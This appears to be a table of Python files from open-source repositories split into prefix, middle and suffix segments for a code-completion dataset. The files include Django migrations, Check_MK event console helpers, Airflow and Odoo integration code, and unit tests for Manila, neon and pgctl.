repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
bkosawa/admin-recommendation | crawler/migrations/0006_user_recommended_apps.py | Python | apache-2.0 | 455 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-03-25 22:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
de | pendencies = [
('crawler', '0005_userapps'),
]
operations = [
migrations.AddField(
m | odel_name='user',
name='recommended_apps',
field=models.ManyToManyField(to='crawler.App'),
),
]
|
scopatz/regolith | regolith/helpers/a_proprevhelper.py | Python | cc0-1.0 | 4,818 | 0.002491 | """Builder for Current and Pending Reports."""
import datetime as dt
import sys
import time
from argparse import RawTextHelpFormatter
import nameparser
from regolith.helpers.basehelper import SoutHelperBase, DbHelperBase
from regolith.dates import month_to_int, month_to_str_int
from regolith.fsclient import _id_key
from regolith.sorters import position_key
from regolith.tools import (
all_docs_from_collection,
filter_grants,
fuzzy_retrieval,
)
ALLOWED_TYPES = ["nsf", "doe", "other"]
ALLOWED_STATI = ["invited", "accepted", "declined", "downloaded", "inprogress",
"submitted", "cancelled"]
def subparser(subpi):
subpi.add_argument("name", help= | "pi first name space last name in quotes",
default=None)
subpi.add_argument("type", help=f"{ALLOWED_TYPES}", default=None)
subpi.add_argu | ment("due_date", help="due date in form YYYY-MM-DD")
subpi.add_argument("-d", "--database",
help="The database that will be updated. Defaults to "
"first database in the regolithrc.json file."
)
subpi.add_argument("-q", "--requester",
help="Name of the Program officer requesting"
)
subpi.add_argument("-r", "--reviewer",
help="name of the reviewer. Defaults to sbillinge")
subpi.add_argument("-s", "--status",
help=f"status, from {ALLOWED_STATI}. default is accepted")
subpi.add_argument("-t", "--title",
help="the title of the proposal")
return subpi
class PropRevAdderHelper(DbHelperBase):
"""Build a helper"""
btype = "a_proprev"
needed_dbs = ['proposalReviews']
def construct_global_ctx(self):
"""Constructs the global context"""
super().construct_global_ctx()
gtx = self.gtx
rc = self.rc
if not rc.database:
rc.database = rc.databases[0]["name"]
rc.coll = "proposalReviews"
gtx["proposalReviews"] = sorted(
all_docs_from_collection(rc.client, "proposalReviews"), key=_id_key
)
gtx["all_docs_from_collection"] = all_docs_from_collection
gtx["float"] = float
gtx["str"] = str
gtx["zip"] = zip
def db_updater(self):
rc = self.rc
name = nameparser.HumanName(rc.name)
month = dt.datetime.today().month
year = dt.datetime.today().year
key = "{}{}_{}_{}".format(
str(year)[-2:], month_to_str_int(month), name.last.casefold(),
name.first.casefold().strip("."))
coll = self.gtx[rc.coll]
pdocl = list(filter(lambda doc: doc["_id"] == key, coll))
if len(pdocl) > 0:
sys.exit("This entry appears to already exist in the collection")
else:
pdoc = {}
pdoc.update({'adequacy_of_resources': [
'The resources available to the PI seem adequate'],
'agency': rc.type,
'competency_of_team': [],
'doe_appropriateness_of_approach': [],
'doe_reasonableness_of_budget': [],
'doe_relevance_to_program_mission': [],
'does_how': [],
'does_what': '',
'due_date': rc.due_date,
'freewrite': [],
'goals': [],
'importance': [],
'institutions': [],
'month': 'tbd',
'names': name.full_name,
'nsf_broader_impacts': [],
'nsf_create_original_transformative': [],
'nsf_plan_good': [],
'nsf_pot_to_advance_knowledge': [],
'nsf_pot_to_benefit_society': [],
'status': 'accepted',
'summary': '',
'year': 2020
})
if rc.title:
pdoc.update({'title': rc.title})
else:
pdoc.update({'title': ''})
if rc.requester:
pdoc.update({'requester': rc.requester})
else:
pdoc.update({'requester': ''})
if rc.reviewer:
pdoc.update({'reviewer': rc.reviewer})
else:
pdoc.update({'reviewer': 'sbillinge'})
if rc.status:
if rc.status not in ALLOWED_STATI:
raise ValueError(
"status should be one of {}".format(ALLOWED_STATI))
else:
pdoc.update({'status': rc.status})
else:
pdoc.update({'status': 'accepted'})
pdoc.update({"_id": key})
rc.client.insert_one(rc.database, rc.coll, pdoc)
print("{} proposal has been added/updated in proposal reviews".format(
rc.name))
return
|
adventurerscodex/uat | components/core/character/proficiency.py | Python | gpl-3.0 | 1,561 | 0 | """Proficiency components."""
from component_objects import Component, Element
class ProficiencyAddModal(Component):
"""Definition of proficiency add modal component."""
modal_div_id = 'addProficiency'
name_id = 'proficiencyAddNameInput'
type_id = 'proficiencyAddTypeInput'
description_id = 'proficiencyAddDescriptionTextarea'
add_id = 'proficiencyAddAddButton'
modal_div = Element(id_=modal_div_id)
name = Element(id_=name_id)
type_ = Element(id_=type_id)
description = Element(id_=description_id)
add = Element(id_=add_id)
class ProficiencyEditModal(Component):
"""Definition of proficiency edit modal component."""
modal_div_id = 'viewProficiency'
name_id = 'proficiencyEditNameInput'
type_id = 'proficiencyEditTypeInput'
description_id = 'proficiencyEditDescriptionTextarea'
done_id = 'proficiencyEditDoneButton'
modal_div = Element(id_=modal_div_id)
name = Element(id_= | name_id)
type_ = Element(id_=type_id)
description = Element(id_=description_id)
done = Element(id_=done_id)
class ProficiencyModalTabs(Component):
"""Definition of profici | ency modal tabs component."""
preview_id = 'proficiencyModalPreview'
edit_id = 'proficiencyModalEdit'
preview = Element(id_=preview_id)
edit = Element(id_=edit_id)
class ProficiencyTable(Component):
"""Definition of proficiencys edit modal componenet."""
add_id = 'proficiencyAddIcon'
table_id = 'proficiencyTable'
add = Element(id_=add_id)
table = Element(id_=table_id)
|
bukzor/pgctl | tests/unit/cli.py | Python | mit | 950 | 0 | # -*- coding: utf-8 -*-
# pylint:disable=redefined-outer-name,unused-argument
from __future__ import absolute_import
from __future__ import unicode_literals
from testfixtures import ShouldRaise
from pgctl.cli import main
def test_start(in_example_dir):
assert main(['start']) == "No such playground service: 'default'"
def test_stop(in_example_dir):
assert main(['stop']) == "No such playground service: 'default'"
def test_status( | in_example_dir):
assert main(['status']) is None
def test_restart(in_example_dir):
assert main(['restart']) is None
def test_reload(in_example_dir):
assert main(['reload']) is None
def test_log(in_example_dir):
assert main(['log']) is None
def test_debug(in_example_dir):
assert main(['debug']) is None
def test_config(in_example_dir):
assert main(['config']) is None
def test_nonsense(in_example_dir):
with ShouldRaise(SystemExit(2)):
main(['non | sense'])
|
huiyiqun/check_mk | web/htdocs/mkeventd.py | Python | gpl-2.0 | 15,616 | 0.006404 | #!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright Mathias Kettner 2014 mk@mathias-kettner.de |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
import ast
import re
import socket
import time
import os
from pathlib2 import Path
import config
import livestatus
import sites
from gui_exceptions import MKGeneralException
import cmk.paths
import cmk.ec.settings
import cmk.ec.export
import cmk.store
import cmk.utils
if cmk.is_managed_edition():
import managed
else:
managed = None
# ASN1 MIB source directory candidates. Non existing dirs are ok.
# Please sync these paths with htdocs/mkeventd.py
mib_dirs = [ ('/usr/share/snmp/mibs', _('System MIBs')) ]
socket_path = cmk.paths.omd_root + "/tmp/run/mkeventd/status"
compiled_mibs_dir = cmk.paths.omd_root + "/local/share/check_mk/compiled_mibs"
# Please sync these paths with htdocs/mkeventd.py
mib_upload_dir = cmk.paths.omd_root + "/local/share/snmp/mibs"
mib_dirs.insert(0, (cmk.paths.omd_root + "/share/snmp/mibs", _('MIBs shipped with Check_MK')))
mib_dirs.insert(0, (mib_upload_dir, _('Custom MIBs')))
syslog_priorities = [
(0, "emerg" ),
(1, "alert" ),
(2, "crit" ),
(3, "err" ),
(4, "warning" ),
(5, "notice" ),
(6, "info" ),
(7, "debug" ),
]
syslog_facilities = [
(0, "kern"),
(1, "user"),
(2, "mail"),
(3, "daemon"),
(4, "auth"),
(5, "syslog"),
(6, "lpr"),
(7, "news"),
(8, "uucp"),
(9, "cron"),
(10, "authpriv"),
(11, "ftp"),
(12, "(12: unused)"),
(13, "(13: unused)"),
(14, "(14: unused)"),
(15, "(15: unused)"),
(16, "local0"),
(17, "local1"),
(18, "local2"),
(19, "local3"),
(20, "local4"),
(21, "local5"),
(22, "local6"),
(23, "local7"),
(31, "snmptrap"),
]
phase_names = {
'counting' : _("counting"),
'delayed' : _("delayed"),
'open' : _("open"),
'ack' : _("acknowledged"),
'closed' : _("closed"),
}
action_whats = {
"ORPHANED" : _("Event deleted in counting state because rule was deleted."),
"NOCOUNT" : _("Event deleted in counting state because rule does not count anymore"),
"DELAYOVER" : _("Event opened because the delay time has elapsed before cancelling event arrived."),
"EXPIRED" : _("Event deleted because its livetime expired"),
"COUNTREACHED" : _("Event deleted because required count had been reached"),
"COUNTFAILED" : _("Event created by required count was not reached in time"),
"UPDATE" : _("Event information updated by user"),
"NEW" : _("New event created"),
"DELETE" : _("Event deleted manually by user"),
"EMAIL" : _("Email sent"),
"SCRIPT" : _("Script executed"),
"CANCELLED" : _("The event was cancelled because the corresponding OK message was received"),
"ARCHIVED" : _("Event was archived because no rule matched and archiving is activated in global settings."),
"AUTODELETE" : _("Event was deleted automatically"),
"CHANGESTATE" : _("State of event changed by user"),
}
def service_levels():
try:
return config.mkeventd_service_levels
except:
return [(0, "(no service level)")]
def action_choices(omit_hidden = False):
# The possible actions are configured in mkeventd.mk,
# not in multisite.mk (like the service levels). That
# way we have not direct access to them but need
# to load them from the configuration.
return [ ( "@NOTIFY", _("Send monitoring notification")) ] + \
[ (a["id"], a["title"])
for a in eventd_configuration().get("actions", [])
if not omit_hidden or not a.get("hidden") ]
cached_config = None
def | eventd_configuration():
global cached_config
if cached_config and cached_config[0] is html:
return cached_config[1]
settings = cmk.ec.settings.settings('',
Path(cmk.paths.omd_root),
Path(cmk.paths.default_config_dir),
[''])
config = cmk.ec.export.load | _config(settings)
cached_config = (html, config)
return config
def daemon_running():
return os.path.exists(socket_path)
# Note: in order to be able to simulate an original IP address
# we put hostname|ipaddress into the host name field. The EC
# recognizes this and unpacks the data correctly.
def send_event(event):
# "<%PRI%>@%TIMESTAMP%;%SL% %HOSTNAME% %syslogtag% %msg%\n"
prio = (event["facility"] << 3) + event["priority"]
rfc = [
"<%d>@%d" % (prio, int(time.time())),
"%d %s|%s %s: %s\n" % (event["sl"], event["host"],
event["ipaddress"], event["application"], event["text"]),
]
execute_command("CREATE", map(cmk.utils.make_utf8, rfc), site=event["site"])
return ";".join(rfc)
def get_local_ec_status():
response = livestatus.LocalConnection().query("GET eventconsolestatus")
return dict(zip(response[0], response[1]))
def replication_mode():
try:
status = get_local_ec_status()
return status["status_replication_slavemode"]
except livestatus.MKLivestatusSocketError:
return "stopped"
# Only use this for master/slave replication. For status queries use livestatus
def query_ec_directly(query):
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
timeout = config.mkeventd_connect_timeout
except:
timeout = 10
sock.settimeout(timeout)
sock.connect(socket_path)
sock.sendall(query)
sock.shutdown(socket.SHUT_WR)
response_text = ""
while True:
chunk = sock.recv(8192)
response_text += chunk
if not chunk:
break
return ast.literal_eval(response_text)
except SyntaxError, e:
raise MKGeneralException(_("Invalid response from event daemon: "
"<pre>%s</pre>") % response_text)
except Exception, e:
raise MKGeneralException(_("Cannot connect to event daemon via %s: %s") %
(socket_path, e))
def execute_command(name, args=None, site=None):
if args:
formated_args = ";" + ";".join(args)
else:
formated_args = ""
query = "[%d] EC_%s%s" % (int(time.time()), name, formated_args)
sites.live().command(query, site)
def get_total_stats(only_sites):
stats_keys = [
"status_average_message_rate",
"status_average_rule_trie_rate",
"status_average_rule_hit_rate",
"status_average_event_rate",
"status_average_connect_rate",
"status_average_overflow_rate",
"status_average_rule_trie_rate",
"status_average_rule_hit_rate",
"status_average_proce |
brandsoulmates/incubator-airflow | airflow/operators/S3_to_FS.py | Python | apache-2.0 | 1,792 | 0 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from airflow.hooks.S3_hook import S3Hook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class S3ToFileSystem(BaseOperator):
@apply_defaults
def __init__(
self,
s3_bucket,
s3_key,
download_file_location,
s3_conn_id='s3_default',
* a | rgs, **kwargs):
super(S3ToFileSystem, self).__init__(*args, **kwargs)
self.local_location = download_file_location
self.s3_bucket = s3_bucket
self.s3_key = s3_key
self.s3_conn_id = s3_conn_id
def | execute(self, context):
self.s3 = S3Hook(s3_conn_id=self.s3_conn_id)
file_paths = []
for k in self.s3.list_keys(self.s3_bucket, prefix=self.s3_key):
kpath = os.path.join(self.local_location, os.path.basename(k))
# Download the file
self.s3.download_file(self.s3_bucket, k, kpath)
file_paths.append(kpath)
context['ti'].xcom_push(key=kpath, value="")
context['ti'].xcom_push(key="files_added", value=file_paths)
# read in chunks
# start reading from the file.
# insert in respective SQS operators
|
vponomaryov/manila | manila_tempest_tests/tests/api/admin/test_migration_negative.py | Python | apache-2.0 | 14,208 | 0 | # Copyright 2015 Hitachi Data Systems.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib import exceptions as lib_exc
import testtools
from testtools import testcase as tc
from manila_tempest_tests.common import constants
from manila_tempest_tests import share_exceptions
from manila_tempest_tests.tests.api import base
from manila_tempest_tests import utils
CONF = config.CONF
@ddt.ddt
class MigrationNegativeTest(base.BaseSharesAdminTest):
"""Tests Share Migration.
Tests share migration in multi-backend environment.
"""
protocol = "nfs"
@classmethod
def resource_setup(cls):
super(MigrationNegativeTest, cls).resource_setup()
if cls.protocol not in CONF.share.enable_protocols:
message = "%s tests are disabled." % cls.protocol
raise cls.skipException(message)
if not (CONF.share.run_host_assisted_migration_tests or
CONF.share.run_driver_assisted_migration_tests):
raise cls.skipException("Share migration tests are disabled.")
pools = cls.shares_client.list_pools(detail=True)['pools']
if len(pools) < 2:
raise cls.skipException("At least two different pool entries "
"are needed to run share migration tests.")
cls.share = cls.create_share(cls.protocol,
size=CONF.share.share_size+1)
cls.share = cls.shares_client.get_share(cls.share['id'])
cls.default_type = cls.shares_v2_client.list_share_types(
default=True)['share_type']
dest_pool = utils.choose_matching_backend(
cls.share, pools, cls.default_type)
if not dest_pool or dest_pool.get('name') is None:
raise share_exceptions.ShareMigrationException(
"No valid pool entries to run share migration tests.")
cls.dest_pool = dest_pool['name']
cls.new_type_invalid = cls.create_share_type(
name=data_utils.rand_name(
'new_invalid_share_type_for_migration'),
cleanup_in_class=True,
extra_specs=utils.get_configured_extra_specs(variation='invalid'))
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_cancel_invalid(self):
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migration_cancel,
self.share['id'])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_get_progress_None(self):
self.shares_v2_client.reset_task_state(self.share["id"], None)
self.shares_v2_client.wait_for_share_status(
self.share["id"], None, 'task_state')
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migration_get_progress,
self.share['id'])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_complete_invalid(self):
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migration_complete,
self.share['id'])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_cancel_not_foun | d(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migration_cancel,
'invalid_share_id')
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_get_progress_not_found(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migration_get_progress,
'invalid_share_id')
@tc.attr(base.TAG_NEGATIVE, base.TAG_ | API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.22")
def test_migration_complete_not_found(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migration_complete,
'invalid_share_id')
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
@testtools.skipUnless(CONF.share.run_snapshot_tests,
"Snapshot tests are disabled.")
def test_migrate_share_with_snapshot(self):
snap = self.create_snapshot_wait_for_active(self.share['id'])
self.assertRaises(
lib_exc.Conflict, self.shares_v2_client.migrate_share,
self.share['id'], self.dest_pool,
force_host_assisted_migration=True)
self.shares_v2_client.delete_snapshot(snap['id'])
self.shares_v2_client.wait_for_resource_deletion(snapshot_id=snap[
"id"])
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
@ddt.data(True, False)
def test_migrate_share_same_host(self, specified):
new_share_type_id = None
new_share_network_id = None
if specified:
new_share_type_id = self.default_type['id']
new_share_network_id = self.share['share_network_id']
self.migrate_share(
self.share['id'], self.share['host'],
wait_for_status=constants.TASK_STATE_MIGRATION_SUCCESS,
new_share_type_id=new_share_type_id,
new_share_network_id=new_share_network_id)
# NOTE(ganso): No need to assert, it is already waiting for correct
# status (migration_success).
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
def test_migrate_share_host_invalid(self):
self.assertRaises(
lib_exc.NotFound, self.shares_v2_client.migrate_share,
self.share['id'], 'invalid_host')
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
@ddt.data({'writable': False, 'preserve_metadata': False,
'preserve_snapshots': False, 'nondisruptive': True},
{'writable': False, 'preserve_metadata': False,
'preserve_snapshots': True, 'nondisruptive': False},
{'writable': False, 'preserve_metadata': True,
'preserve_snapshots': False, 'nondisruptive': False},
{'writable': True, 'preserve_metadata': False,
'preserve_snapshots': False, 'nondisruptive': False})
@ddt.unpack
def test_migrate_share_host_assisted_not_allowed_API(
self, writable, preserve_metadata, preserve_snapshots,
nondisruptive):
self.assertRaises(
lib_exc.BadRequest, self.shares_v2_client.migrate_share,
self.share['id'], self.dest_pool,
force_host_assisted_migration=True, writable=writable,
preserve_metadata=preserve_metadata, nondisruptive=nondisruptive,
preserve_snapshots=preserve_snapshots)
@tc.attr(base.TAG_NEGATIVE, base.TAG_API_WITH_BACKEND)
@base.skip_if_microversion_lt("2.29")
def test_migrate_share_change_type_no_valid_host(self):
if not CONF.share.multitenancy_enabled:
new_share_network_id = self.create_share_network(
neutron_net_id='fake_net_id',
neutron_subnet_id='fake_subnet_id')['id']
else:
new_share_network_id = None
self.shares_v2_client.migrate_share(
self.share['id'], self.dest_pool,
new_share_type_id=self.new_type_invalid['share_type']['id'],
new_share_network_id= |
jfsantos/neon | tests/test_costs.py | Python | apache-2.0 | 5,749 | 0.001044 | # Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
'''
Test of the cost functions
'''
import numpy as np
from neon import NervanaObject
from neon.transforms import (CrossEntropyBinary, CrossEntropyMulti, SumSquared,
Misclassification)
def compare_tensors(func, y, t, outputs, deriv=False, tol=0.):
be = NervanaObject.be
temp = be.empty(outputs.shape)
dtypeu = np.float32
if deriv is True:
temp[:] = func.bprop(be.array(dtypeu(y)), be.array(dtypeu(t)))
else:
# try:
temp[:] = func(be.array(dtypeu(y)), be.array(dtypeu(t)))
# except:
# import ipdb; ipdb.set_trace()
cond = np.sum(np.abs(temp.get() - outputs) <= tol)
assert cond == np.prod(outputs.shape)
"""
CrossEntropyBinary
"""
def test_cross_entropy_binary(backend_default):
outputs = np.array([0.5, 0.9, 0.1, 0.0001]).reshape((4, 1))
targets = np.array([0.5, 0.99, 0.01, 0.2]).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum((-targets * np.log(outputs + eps)) -
(1 - targets) * np.log(1 - outputs + eps),
keepdims=True)
compare_tensors(CrossEntropyBinary(),
outputs, targets, expected_result, tol=1e-6)
def test_cross_entropy_binary_limits(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum((-targets * np.log(outputs + eps)) -
(1 - targets) * np.log(1 - outputs + eps),
keepdims=True)
compare_tensors(CrossEntropyBinary(),
outputs, targets, expected_result, tol=1e-5)
def test_cross_entropy_binary_derivative(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
# bprop assumes shortcut
expected_result = ((outputs - targets) / outputs.shape[1])
compare_tensors(
CrossEntropyBinary(), outputs, targets, expected_result, deriv=True,
tol=1e-6)
"""
CrossEntropyMulti
"""
def test_cross_entropy_multi(backend_default):
outputs = np.array([0.5, 0.9, 0.1, 0.0001]).reshape((4, 1))
targets = np.array([0.5, 0.99, 0.01, 0.2]).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum(-targets * np.log(np.clip(outputs, eps, 1.0)),
axis=0, keepdims=True)
compare_tensors(CrossEntropyMulti(),
outputs, targets, expected_result, tol=1e-6)
def test_cross_entropy_multi_limits(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
eps = 2 ** -23
expected_result = np.sum(-targets * np.log(np.clip(outputs, eps, 1.0)),
axis=0, keepdims=True)
compare_tensors(CrossEntropyM | ulti(),
outputs, targets, expected_result, tol=1e-5)
def test_cross_entropy_multi_derivative(backend_default):
outputs = np | .array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
expected_result = ((outputs - targets) / outputs.shape[1])
compare_tensors(CrossEntropyMulti(), outputs, targets, expected_result,
deriv=True, tol=1e-6)
"""
SumSquared
"""
def test_sum_squared(backend_default):
outputs = np.array([0.5, 0.9, 0.1, 0.0001]).reshape((4, 1))
targets = np.array([0.5, 0.99, 0.01, 0.2]).reshape((4, 1))
expected_result = np.sum((outputs - targets) ** 2, axis=0, keepdims=True) / 2.
compare_tensors(SumSquared(), outputs, targets, expected_result, tol=1e-8)
def test_sum_squared_limits(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
expected_result = np.sum((outputs - targets) ** 2, axis=0, keepdims=True) / 2.
compare_tensors(SumSquared(), outputs, targets, expected_result, tol=1e-7)
def test_sum_squared_derivative(backend_default):
outputs = np.array([0.5, 1.0, 0.0, 0.0001]).reshape((4, 1))
targets = np.array(([0.5, 0.0, 1.0, 0.2])).reshape((4, 1))
expected_result = (outputs - targets) / outputs.shape[1]
compare_tensors(SumSquared(), outputs,
targets, expected_result, deriv=True, tol=1e-8)
"""
Misclassification
"""
def compare_metric(func, y, t, outputs, deriv=False, tol=0.):
be = NervanaObject.be
dtypeu = np.float32
temp = func(be.array(dtypeu(y)), be.array(dtypeu(t)))
cond = np.sum(np.abs(temp - outputs) <= tol)
assert cond == np.prod(outputs.shape)
def test_misclassification(backend_default):
NervanaObject.be.bsz = 3
outputs = np.array(
[[0.25, 0.99, 0.33], [0.5, 0.005, 0.32], [0.25, 0.005, 0.34]])
targets = np.array([[0, 1, 0], [1, 0, 1], [0, 0, 0]])
expected_result = np.ones((1, 1)) / 3.
compare_metric(Misclassification(),
outputs, targets, expected_result, tol=1e-7)
|
rven/odoo | addons/microsoft_calendar/models/res_users.py | Python | agpl-3.0 | 5,093 | 0.003927 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
import requests
from odoo.addons.microsoft_calendar.models.microsoft_sync import microsoft_calendar_token
from datetime import timedelta
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.loglevels import exception_to_unicode
from odoo.addons.microsoft_account.models.microsoft_service import MICROSOFT_TOKEN_ENDPOINT
from odoo.addons.microsoft_calendar.utils.microsoft_calendar import MicrosoftCalendarService, InvalidSyncToken
_logger = logging.getLogger(__name__)
class User(models.Model):
_inherit = 'res.users'
microsoft_calendar_sync_token = fields.Char('Microsoft Next Sync Token', copy=False)
def _microsoft_calendar_authenticated(self):
return bool(self.sudo().microsoft_calendar_rtoken)
def _get_microsoft_calendar_token(self):
self.ensure_one()
if self._is_microsoft_calendar_valid():
self._refresh_microsoft_calendar_token()
return self.microsoft_calendar_token
def _is_microsoft_calendar_valid(self):
return self.microsoft_calendar_token_validity and self.microsoft_calendar_token_validity < (fields.Datetime.now() + timedelta(minutes=1))
def _refresh_microsoft_calendar_token(self):
self.ensure_one()
get_param = self.env['ir.config_parameter'].sudo().get_param
client_id = get_param('microsoft_calendar_client_id')
client_secret = get_param('microsoft_calendar_client_secret')
if not client_id or not client_secret:
raise UserError(_("The account for the Outlook Calendar service is not configured."))
headers = {"content-type": "application/x-www-form-urlencoded"}
data = {
'refresh_token': self.microsoft_calendar_rtoken,
'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
}
try:
dummy, response, dummy = self.env['microsoft.service']._do_request(MICROSOFT_TOKEN_ENDPOINT, params=data, headers=headers, method='POST', preuri='')
ttl = response.get('expires_in')
self.write({
'microsoft_calendar_token': response.get('access_token'),
'microsoft_calendar_token_validity': fields.Datetime.now() + timedelta(seconds=ttl),
})
except requests.HTTPError as error:
if error.response.status_code == 400: # invalid grant
# Delete refresh token and make sure it's commited
with self.pool.cursor() as cr:
self.env.user.with_env(self.env(cr=cr)).write({'microsoft_calendar_rtoken': False})
error_key = error.response.json().get("error", "nc")
error_msg = _("Something went wrong during your token generation. Maybe your Authorization Code is invalid or already expired [%s]", error_key)
raise UserError(error_msg)
def _sync_microsoft_calendar(self, calendar_service: MicrosoftCalendarService):
self.ensure_one()
full_sync = not bool(self.microsoft_calendar_sync_token)
with microsoft_calendar_token(self) as token:
try:
events, next_sync_token, default_reminders = calendar_service.get_events(self.microsoft_calendar_sync_token, token=token)
except InvalidSyncToken:
events, next_sync_token, default_reminders = calendar_service.get_events(token=token)
full_sync = True
self.microsoft_calendar_sync_token = next_sync_token
# Microsoft -> Odoo
recurrences = events.filter(lambda e: e.is_recurrent())
synced_events, synced_recurrences = self.env['calendar.event']._sync_microsoft2odoo(events, default_reminders=default_reminders) if events else (self.env['calendar.event'], self.env['calendar.recurrence'])
# Odoo -> Microsoft
recurrences = self.env['calendar.recurrence']._get_microsoft_records_to_sync(full_sync=full_sync)
recurrences -= synced_recurrences
recurrences._sync_odoo2microsoft(calendar_service)
synced_events |= recurrences.calendar_event_ids
events = self.env['calendar.event']._get_microsoft_records_to_sync(full_sync=full_sync)
(events - synced_events)._sync_odoo2microsoft(calendar_service)
return bool(events | synced_events) or bool(recurrences | synced_recurrences)
@api.model
def _sync_all_microsoft_calendar(self):
""" Cron job """
users = self.env['res.users'].search([('microsoft_calendar_rtoken', '!=', False)])
microsoft = MicrosoftCalendarService(self.env['microsoft.service'])
for user in users:
_logger.i | nfo("Calendar Synchro - Starting synchronization for %s", user)
try:
user.with_user(user).sudo()._sync_microsoft_calendar(microsoft)
except Exception as e:
_logger. | exception("[%s] Calendar Synchro - Exception : %s !", user, exception_to_unicode(e))
|
phobson/mpl-probscale | probscale/validate.py | Python | bsd-3-clause | 2,443 | 0 | from matplotlib import pyplot
from .algo import _bs_fit
def axes_object(ax):
""" Checks if a value if an Axes. If None, a new one is created.
Both the figure and axes are returned (in that order).
"""
if ax is None:
ax = pyplot.gca()
fig = ax.figure
elif isinstance(ax, pyplot.Axes):
fig = ax.figure
else:
msg = "`ax` must be a matplotlib Axes instance or None"
raise ValueError(msg)
return fig, ax
